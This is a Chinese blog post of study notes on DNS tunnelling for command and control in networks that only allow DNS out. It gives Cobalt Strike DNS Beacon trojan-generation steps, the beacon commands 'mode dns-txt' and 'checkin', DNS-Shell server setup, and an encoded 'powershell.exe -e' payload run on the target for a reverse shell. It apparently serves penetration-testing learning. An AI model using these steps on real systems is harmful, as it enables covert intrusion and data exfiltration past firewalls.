8月16日笔记

只有DNS协议出网场景

DNS 协议是一种请求、应答协议,也是一种可用于应用层的隧道技术。DNS 隧道的工作原理很简单,在进行 DNS 查询时,如果查询的域名不在 DNS 服务器本机缓存中,就会访问互联网进行查询,然后返回结果。如果在互联网上有一台定制的服务器,那么依靠 DNS 协议即可进行数据包的交互。
DNS隧道是一种网络通信技术,它利用域名系统(DNS)协议来传输非DNS数据。这种技术允许将其他类型的数据(如HTTP请求或其他网络协议的数据)封装在DNS请求和响应中,从而绕过防火墙或其他网络过滤机制,因为大多数网络都允许不受限制的DNS流量。通过这种方式,攻击者可以建立隐蔽通道来进行数据窃取、命令控制或渗透测试等活动,而不易被检测到。

CS开启监听DNS Beacon

创建监听器
QQ_1723794732633.png
生成木马
注意,这里生成木马类型得是 Windows Executable(S)
QQ_1723794891302.png
这里勾不勾选 x64 取决于目标主机的架构
QQ_1723794975655.png
只要木马在目标主机执行成功,我们的 CobaltStrike 就能接收到反弹的 shell。但
是默认情况下,主机信息是黑色的。我们需要执行以下命令,让目标主机信息显示出来

checkin
mode dns-txt

在beacon执行以上命令。

利用DNS进行命令控制

DNS-Shell 是一款通过 DNS 信道实现交互式 Shell 的强大工具,该工具的服务器端基于 Python 开发,可以任何一种安装了 Python 环境的操作系统平台上运行,工具所使用的 Payload 均已 PowerShell 命令进行编码,保证了在不同平台间运行的稳定性和兼容性。

下载DNS-Shell

git clone https://github.com/sensepost/DNS-Shell.git

QQ_1723796466434.png

DNS-Shell直接模式
python2 DNS-shell.py -l -d 192.168.5.138  #边缘服务器ip

发现dnslib库没安装。使用pip2 install dnslib又找不到包。
直接下载源码:

git clone https://github.com/paulc/dnslib.git

发现拒绝连接,应该是没代理(kali上);
代理教程:kali网络代理设置-CSDN博客
QQ_1723798958389.png
接收成功。

cd dnslib
python2 setup.py install

QQ_1723799047997.png
完成之后回到DNS-Shell的目录下。
在这里插入图片描述

生成一段payload,将这段payload复制下来。在目标机cmd窗口执行

powershell.exe -e 生成的payload

QQ_1723801977336.png
可以看到,我们已经成功接收到反弹回来的 shell 了。

  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

密码小丑

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值